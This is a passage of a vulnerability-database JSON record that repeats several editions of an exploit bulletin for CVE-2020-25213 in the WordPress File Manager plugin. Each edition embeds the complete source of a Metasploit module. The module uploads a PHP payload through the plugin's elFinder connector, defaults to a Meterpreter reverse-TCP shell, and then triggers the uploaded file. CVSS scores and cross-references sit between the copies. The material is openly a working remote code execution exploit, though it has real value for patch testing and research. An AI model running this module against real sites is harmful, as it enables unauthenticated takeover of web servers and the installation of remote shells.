File Manager 6.0-6.8',\r\n {\r\n 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }\r\n }\r\n ]\r\n ],\r\n 'DisclosureDate' => '2020-09-09', # disclosure date on NVD, PoC was published on August 26 2020\r\n 'DefaultTarget' => 0\r\n )\r\n )\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'Base path to WordPress installation', '/']),\r\n OptEnum.new('COMMAND', [true, 'elFinder commands used to exploit the vulnerability', 'upload', %w[upload mkfile+put]])\r\n ]\r\n )\r\n end\r\n\r\n def check\r\n return CheckCode::Unknown unless wordpress_and_online?\r\n\r\n # check the plugin version from readme\r\n check_plugin_version_from_readme('wp-file-manager', '6.9', '6.0')\r\n end\r\n\r\n def exploit\r\n # base path to File Manager plugin\r\n file_manager_base_uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-file-manager')\r\n # filename of the file to be uploaded/created\r\n filename = \"#{Rex::Text.rand_text_alphanumeric(6)}.php\"\r\n register_file_for_cleanup(filename)\r\n\r\n case datastore['COMMAND']\r\n when 'upload'\r\n elfinder_post(file_manager_base_uri, 'upload', 'payload' => payload.encoded, 'filename' => filename)\r\n when 'mkfile+put'\r\n elfinder_post(file_manager_base_uri, 'mkfile', 'filename' => filename)\r\n elfinder_post(file_manager_base_uri, 'put', 'payload' => payload.encoded, 'filename' => filename)\r\n end\r\n\r\n payload_uri = normalize_uri(file_manager_base_uri, 'lib', 'files', filename)\r\n print_status(\"#{peer} - Payload is at #{payload_uri}\")\r\n # execute the payload\r\n send_request_cgi('uri' => normalize_uri(payload_uri))\r\n end\r\n\r\n # make it easier to switch between \"upload\" and \"mkfile+put\" exploit methods\r\n def elfinder_post(file_manager_base_uri, elfinder_cmd, opts = {})\r\n filename = opts['filename']\r\n\r\n # prep for exploit\r\n post_data = Rex::MIME::Message.new\r\n post_data.add_part(elfinder_cmd, nil, nil, 'form-data; name=\"cmd\"')\r\n\r\n case elfinder_cmd\r\n when 'upload'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, 'application/octet-stream', nil, \"form-data; name=\\\"upload[]\\\"; filename=\\\"#{filename}\\\"\")\r\n when 'mkfile'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(filename, nil, nil, 'form-data; name=\"name\"')\r\n when 'put'\r\n post_data.add_part(\"l1_#{Rex::Text.encode_base64(filename)}\", nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, nil, nil, 'form-data; name=\"content\"')\r\n end\r\n\r\n res = send_request_cgi(\r\n 'uri' => normalize_uri(file_manager_base_uri, 'lib', 'php', 'connector.minimal.php'),\r\n 'method' => 'POST',\r\n 'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\",\r\n 'data' => post_data.to_s\r\n )\r\n\r\n fail_with(Failure::Unreachable, \"#{peer} - Could not connect\") unless res\r\n fail_with(Failure::UnexpectedReply, \"#{peer} - Unexpected HTTP response code: #{res.code}\") unless res.code == 200\r\n end\r\nend\n\n# 0day.today [2021-09-03] #", "category": "", "verified": false}, "lastseen": "2021-09-02T22:12:42", "differentElements": ["sourceData"], "edition": 3}, {"bulletin": {"id": "1337DAY-ID-35215", "vendorId": null, "hash": "1e6b416238b18057b983734bb00440c3", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress File Manager 6.8 Remote Code Execution Exploit", "description": "The WordPress File Manager (wp-file-manager) plugin versions 6.0 through 6.8 allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.", "published": "2020-11-10T00:00:00", "modified": "2020-11-10T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/35215", "reporter": "zdt", "references": [], "cvelist": ["CVE-2020-25213"], "immutableFields": [], "lastseen": "2021-09-03T22:12:10", "history": [], "viewCount": 2, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:AA7F75B5-85DC-4246-932B-C13A3A39B197"]}, {"type": "cve", "idList": ["CVE-2020-25213"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "nessus", "idList": ["WORDPRESS_PLUGIN_WP_FILE_MANAGER_6_9_RCE.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:160003"]}, {"type": "wpexploit", "idList": ["WPEX-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "dsquare", "idList": ["E-722"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:7D610378313C0D3F9F5525CC2D5907A7"]}, {"type": "thn", "idList": ["THN:7FD924637D99697D78D53283817508DA"]}], "modified": "2021-09-03T22:12:10", "rev": 2}, "score": {"value": 7.2, "vector": "NONE", "modified": "2021-09-03T22:12:10", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/35215", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::HTTP::Wordpress\r\n prepend Msf::Exploit::Remote::AutoCheck\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(\r\n update_info(\r\n info,\r\n 'Name' => 'WordPress File Manager Unauthenticated Remote Code Execution',\r\n 'Description' => %q{\r\n The File Manager (wp-file-manager) plugin from 6.0 to 6.8 for WordPress allows remote attackers to upload and\r\n execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php\r\n extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write\r\n PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Alex Souza (w4fz5uck5)', # initial discovery and PoC\r\n 'Imran E. Dawoodjee <imran [at] threathounds.com>', # msf module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'URL', 'https://github.com/w4fz5uck5/wp-file-manager-0day' ],\r\n [ 'URL', 'https://www.tenable.com/cve/CVE-2020-25213' ],\r\n [ 'CVE', '2020-25213' ]\r\n ],\r\n 'Platform' => [ 'php' ],\r\n 'Privileged' => false,\r\n 'Arch' => ARCH_PHP,\r\n 'Targets' =>\r\n [\r\n [\r\n 'WordPress File Manager 6.0-6.8',\r\n {\r\n 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }\r\n }\r\n ]\r\n ],\r\n 'DisclosureDate' => '2020-09-09', # disclosure date on NVD, PoC was published on August 26 2020\r\n 'DefaultTarget' => 0\r\n )\r\n )\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'Base path to WordPress installation', '/']),\r\n OptEnum.new('COMMAND', [true, 'elFinder commands used to exploit the vulnerability', 'upload', %w[upload mkfile+put]])\r\n ]\r\n )\r\n end\r\n\r\n def check\r\n return CheckCode::Unknown unless wordpress_and_online?\r\n\r\n # check the plugin version from readme\r\n check_plugin_version_from_readme('wp-file-manager', '6.9', '6.0')\r\n end\r\n\r\n def exploit\r\n # base path to File Manager plugin\r\n file_manager_base_uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-file-manager')\r\n # filename of the file to be uploaded/created\r\n filename = \"#{Rex::Text.rand_text_alphanumeric(6)}.php\"\r\n register_file_for_cleanup(filename)\r\n\r\n case datastore['COMMAND']\r\n when 'upload'\r\n elfinder_post(file_manager_base_uri, 'upload', 'payload' => payload.encoded, 'filename' => filename)\r\n when 'mkfile+put'\r\n elfinder_post(file_manager_base_uri, 'mkfile', 'filename' => filename)\r\n elfinder_post(file_manager_base_uri, 'put', 'payload' => payload.encoded, 'filename' => filename)\r\n end\r\n\r\n payload_uri = normalize_uri(file_manager_base_uri, 'lib', 'files', filename)\r\n print_status(\"#{peer} - Payload is at #{payload_uri}\")\r\n # execute the payload\r\n send_request_cgi('uri' => normalize_uri(payload_uri))\r\n end\r\n\r\n # make it easier to switch between \"upload\" and \"mkfile+put\" exploit methods\r\n def elfinder_post(file_manager_base_uri, elfinder_cmd, opts = {})\r\n filename = opts['filename']\r\n\r\n # prep for exploit\r\n post_data = Rex::MIME::Message.new\r\n post_data.add_part(elfinder_cmd, nil, nil, 'form-data; name=\"cmd\"')\r\n\r\n case elfinder_cmd\r\n when 'upload'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, 'application/octet-stream', nil, \"form-data; name=\\\"upload[]\\\"; filename=\\\"#{filename}\\\"\")\r\n when 'mkfile'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(filename, nil, nil, 'form-data; name=\"name\"')\r\n when 'put'\r\n post_data.add_part(\"l1_#{Rex::Text.encode_base64(filename)}\", nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, nil, nil, 'form-data; name=\"content\"')\r\n end\r\n\r\n res = send_request_cgi(\r\n 'uri' => normalize_uri(file_manager_base_uri, 'lib', 'php', 'connector.minimal.php'),\r\n 'method' => 'POST',\r\n 'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\",\r\n 'data' => post_data.to_s\r\n )\r\n\r\n fail_with(Failure::Unreachable, \"#{peer} - Could not connect\") unless res\r\n fail_with(Failure::UnexpectedReply, \"#{peer} - Unexpected HTTP response code: #{res.code}\") unless res.code == 200\r\n end\r\nend\n\n# 0day.today [2021-09-04] #", "category": "", "verified": false}, "lastseen": "2021-09-03T22:12:10", "differentElements": ["sourceData"], "edition": 4}, {"bulletin": {"id": "1337DAY-ID-35215", "vendorId": null, "hash": "69ba019c532cd54a4a1f0213b59fb9bc", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress File Manager 6.8 Remote Code Execution Exploit", "description": "The WordPress File Manager (wp-file-manager) plugin versions 6.0 through 6.8 allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.", "published": "2020-11-10T00:00:00", "modified": "2020-11-10T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/35215", "reporter": "zdt", "references": [], "cvelist": ["CVE-2020-25213"], "immutableFields": [], "lastseen": "2021-09-04T22:13:40", "history": [], "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:AA7F75B5-85DC-4246-932B-C13A3A39B197"]}, {"type": "cve", "idList": ["CVE-2020-25213"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:160003"]}, {"type": "wpexploit", "idList": ["WPEX-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "dsquare", "idList": ["E-722"]}, {"type": "nessus", "idList": ["WORDPRESS_PLUGIN_WP_FILE_MANAGER_6_9_RCE.NASL"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:7D610378313C0D3F9F5525CC2D5907A7"]}, {"type": "thn", "idList": ["THN:7FD924637D99697D78D53283817508DA"]}], "modified": "2021-09-04T22:13:40", "rev": 2}, "score": {"value": 7.2, "vector": "NONE", "modified": "2021-09-04T22:13:40", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/35215", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::HTTP::Wordpress\r\n prepend Msf::Exploit::Remote::AutoCheck\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(\r\n update_info(\r\n info,\r\n 'Name' => 'WordPress File Manager Unauthenticated Remote Code Execution',\r\n 'Description' => %q{\r\n The File Manager (wp-file-manager) plugin from 6.0 to 6.8 for WordPress allows remote attackers to upload and\r\n execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php\r\n extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write\r\n PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Alex Souza (w4fz5uck5)', # initial discovery and PoC\r\n 'Imran E. Dawoodjee <imran [at] threathounds.com>', # msf module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'URL', 'https://github.com/w4fz5uck5/wp-file-manager-0day' ],\r\n [ 'URL', 'https://www.tenable.com/cve/CVE-2020-25213' ],\r\n [ 'CVE', '2020-25213' ]\r\n ],\r\n 'Platform' => [ 'php' ],\r\n 'Privileged' => false,\r\n 'Arch' => ARCH_PHP,\r\n 'Targets' =>\r\n [\r\n [\r\n 'WordPress File Manager 6.0-6.8',\r\n {\r\n 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }\r\n }\r\n ]\r\n ],\r\n 'DisclosureDate' => '2020-09-09', # disclosure date on NVD, PoC was published on August 26 2020\r\n 'DefaultTarget' => 0\r\n )\r\n )\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'Base path to WordPress installation', '/']),\r\n OptEnum.new('COMMAND', [true, 'elFinder commands used to exploit the vulnerability', 'upload', %w[upload mkfile+put]])\r\n ]\r\n )\r\n end\r\n\r\n def check\r\n return CheckCode::Unknown unless wordpress_and_online?\r\n\r\n # check the plugin version from readme\r\n check_plugin_version_from_readme('wp-file-manager', '6.9', '6.0')\r\n end\r\n\r\n def exploit\r\n # base path to File Manager plugin\r\n file_manager_base_uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-file-manager')\r\n # filename of the file to be uploaded/created\r\n filename = \"#{Rex::Text.rand_text_alphanumeric(6)}.php\"\r\n register_file_for_cleanup(filename)\r\n\r\n case datastore['COMMAND']\r\n when 'upload'\r\n elfinder_post(file_manager_base_uri, 'upload', 'payload' => payload.encoded, 'filename' => filename)\r\n when 'mkfile+put'\r\n elfinder_post(file_manager_base_uri, 'mkfile', 'filename' => filename)\r\n elfinder_post(file_manager_base_uri, 'put', 'payload' => payload.encoded, 'filename' => filename)\r\n end\r\n\r\n payload_uri = normalize_uri(file_manager_base_uri, 'lib', 'files', filename)\r\n print_status(\"#{peer} - Payload is at #{payload_uri}\")\r\n # execute the payload\r\n send_request_cgi('uri' => normalize_uri(payload_uri))\r\n end\r\n\r\n # make it easier to switch between \"upload\" and \"mkfile+put\" exploit methods\r\n def elfinder_post(file_manager_base_uri, elfinder_cmd, opts = {})\r\n filename = opts['filename']\r\n\r\n # prep for exploit\r\n post_data = Rex::MIME::Message.new\r\n post_data.add_part(elfinder_cmd, nil, nil, 'form-data; name=\"cmd\"')\r\n\r\n case elfinder_cmd\r\n when 'upload'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, 'application/octet-stream', nil, \"form-data; name=\\\"upload[]\\\"; filename=\\\"#{filename}\\\"\")\r\n when 'mkfile'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(filename, nil, nil, 'form-data; name=\"name\"')\r\n when 'put'\r\n post_data.add_part(\"l1_#{Rex::Text.encode_base64(filename)}\", nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, nil, nil, 'form-data; name=\"content\"')\r\n end\r\n\r\n res = send_request_cgi(\r\n 'uri' => normalize_uri(file_manager_base_uri, 'lib', 'php', 'connector.minimal.php'),\r\n 'method' => 'POST',\r\n 'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\",\r\n 'data' => post_data.to_s\r\n )\r\n\r\n fail_with(Failure::Unreachable, \"#{peer} - Could not connect\") unless res\r\n fail_with(Failure::UnexpectedReply, \"#{peer} - Unexpected HTTP response code: #{res.code}\") unless res.code == 200\r\n end\r\nend\n\n# 0day.today [2021-09-05] #", "category": "", "verified": false}, "lastseen": "2021-09-04T22:13:40", "differentElements": ["sourceData"], "edition": 5}, {"bulletin": {"id": "1337DAY-ID-35215", "vendorId": null, "hash": "b0e198436ea0faf0dd25e3e0c5c1de3a", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress File Manager 6.8 Remote Code Execution Exploit", "description": "The WordPress File Manager (wp-file-manager) plugin versions 6.0 through 6.8 allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.", "published": "2020-11-10T00:00:00", "modified": "2020-11-10T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/35215", "reporter": "zdt", "references": [], "cvelist": ["CVE-2020-25213"], "immutableFields": [], "lastseen": "2021-09-05T22:13:08", "history": [], "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:AA7F75B5-85DC-4246-932B-C13A3A39B197"]}, {"type": "cve", "idList": ["CVE-2020-25213"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:160003"]}, {"type": "wpexploit", "idList": ["WPEX-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "dsquare", "idList": ["E-722"]}, {"type": "nessus", "idList": ["WORDPRESS_PLUGIN_WP_FILE_MANAGER_6_9_RCE.NASL"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:7D610378313C0D3F9F5525CC2D5907A7"]}, {"type": "thn", "idList": ["THN:7FD924637D99697D78D53283817508DA"]}], "modified": "2021-09-05T22:13:08", "rev": 2}, "score": {"value": 7.2, "vector": "NONE", "modified": "2021-09-05T22:13:08", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/35215", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::HTTP::Wordpress\r\n prepend Msf::Exploit::Remote::AutoCheck\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(\r\n update_info(\r\n info,\r\n 'Name' => 'WordPress File Manager Unauthenticated Remote Code Execution',\r\n 'Description' => %q{\r\n The File Manager (wp-file-manager) plugin from 6.0 to 6.8 for WordPress allows remote attackers to upload and\r\n execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php\r\n extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write\r\n PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Alex Souza (w4fz5uck5)', # initial discovery and PoC\r\n 'Imran E. Dawoodjee <imran [at] threathounds.com>', # msf module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'URL', 'https://github.com/w4fz5uck5/wp-file-manager-0day' ],\r\n [ 'URL', 'https://www.tenable.com/cve/CVE-2020-25213' ],\r\n [ 'CVE', '2020-25213' ]\r\n ],\r\n 'Platform' => [ 'php' ],\r\n 'Privileged' => false,\r\n 'Arch' => ARCH_PHP,\r\n 'Targets' =>\r\n [\r\n [\r\n 'WordPress File Manager 6.0-6.8',\r\n {\r\n 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }\r\n }\r\n ]\r\n ],\r\n 'DisclosureDate' => '2020-09-09', # disclosure date on NVD, PoC was published on August 26 2020\r\n 'DefaultTarget' => 0\r\n )\r\n )\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'Base path to WordPress installation', '/']),\r\n OptEnum.new('COMMAND', [true, 'elFinder commands used to exploit the vulnerability', 'upload', %w[upload mkfile+put]])\r\n ]\r\n )\r\n end\r\n\r\n def check\r\n return CheckCode::Unknown unless wordpress_and_online?\r\n\r\n # check the plugin version from readme\r\n check_plugin_version_from_readme('wp-file-manager', '6.9', '6.0')\r\n end\r\n\r\n def exploit\r\n # base path to File Manager plugin\r\n file_manager_base_uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-file-manager')\r\n # filename of the file to be uploaded/created\r\n filename = \"#{Rex::Text.rand_text_alphanumeric(6)}.php\"\r\n register_file_for_cleanup(filename)\r\n\r\n case datastore['COMMAND']\r\n when 'upload'\r\n elfinder_post(file_manager_base_uri, 'upload', 'payload' => payload.encoded, 'filename' => filename)\r\n when 'mkfile+put'\r\n elfinder_post(file_manager_base_uri, 'mkfile', 'filename' => filename)\r\n elfinder_post(file_manager_base_uri, 'put', 'payload' => payload.encoded, 'filename' => filename)\r\n end\r\n\r\n payload_uri = normalize_uri(file_manager_base_uri, 'lib', 'files', filename)\r\n print_status(\"#{peer} - Payload is at #{payload_uri}\")\r\n # execute the payload\r\n send_request_cgi('uri' => normalize_uri(payload_uri))\r\n end\r\n\r\n # make it easier to switch between \"upload\" and \"mkfile+put\" exploit methods\r\n def elfinder_post(file_manager_base_uri, elfinder_cmd, opts = {})\r\n filename = opts['filename']\r\n\r\n # prep for exploit\r\n post_data = Rex::MIME::Message.new\r\n post_data.add_part(elfinder_cmd, nil, nil, 'form-data; name=\"cmd\"')\r\n\r\n case elfinder_cmd\r\n when 'upload'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, 'application/octet-stream', nil, \"form-data; name=\\\"upload[]\\\"; filename=\\\"#{filename}\\\"\")\r\n when 'mkfile'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(filename, nil, nil, 'form-data; name=\"name\"')\r\n when 'put'\r\n post_data.add_part(\"l1_#{Rex::Text.encode_base64(filename)}\", nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, nil, nil, 'form-data; name=\"content\"')\r\n end\r\n\r\n res = send_request_cgi(\r\n 'uri' => normalize_uri(file_manager_base_uri, 'lib', 'php', 'connector.minimal.php'),\r\n 'method' => 'POST',\r\n 'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\",\r\n 'data' => post_data.to_s\r\n )\r\n\r\n fail_with(Failure::Unreachable, \"#{peer} - Could not connect\") unless res\r\n fail_with(Failure::UnexpectedReply, \"#{peer} - Unexpected HTTP response code: #{res.code}\") unless res.code == 200\r\n end\r\nend\n\n# 0day.today [2021-09-06] #", "category": "", "verified": false}, "lastseen": "2021-09-05T22:13:08", "differentElements": ["sourceData"], "edition": 6}, {"bulletin": {"id": "1337DAY-ID-35215", "vendorId": null, "hash": "68834de3bb24f4554efac7bee3abb4cd", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress File Manager 6.8 Remote Code Execution Exploit", "description": "The WordPress File Manager (wp-file-manager) plugin versions 6.0 through 6.8 allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.", "published": "2020-11-10T00:00:00", "modified": "2020-11-10T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/35215", "reporter": "zdt", "references": [], "cvelist": ["CVE-2020-25213"], "immutableFields": [], "lastseen": "2021-09-07T06:17:08", "history": [], "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:AA7F75B5-85DC-4246-932B-C13A3A39B197"]}, {"type": "cve", "idList": ["CVE-2020-25213"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:160003"]}, {"type": "wpexploit", "idList": ["WPEX-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "nessus", "idList": ["WORDPRESS_PLUGIN_WP_FILE_MANAGER_6_9_RCE.NASL"]}, {"type": "dsquare", "idList": ["E-722"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:7D610378313C0D3F9F5525CC2D5907A7"]}, {"type": "thn", "idList": ["THN:7FD924637D99697D78D53283817508DA"]}], "modified": "2021-09-07T06:17:08", "rev": 2}, "score": {"value": 7.2, "vector": "NONE", "modified": "2021-09-07T06:17:08", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/35215", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::HTTP::Wordpress\r\n prepend Msf::Exploit::Remote::AutoCheck\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(\r\n update_info(\r\n info,\r\n 'Name' => 'WordPress File Manager Unauthenticated Remote Code Execution',\r\n 'Description' => %q{\r\n The File Manager (wp-file-manager) plugin from 6.0 to 6.8 for WordPress allows remote attackers to upload and\r\n execute arbitrary PHP code because it renames an unsafe 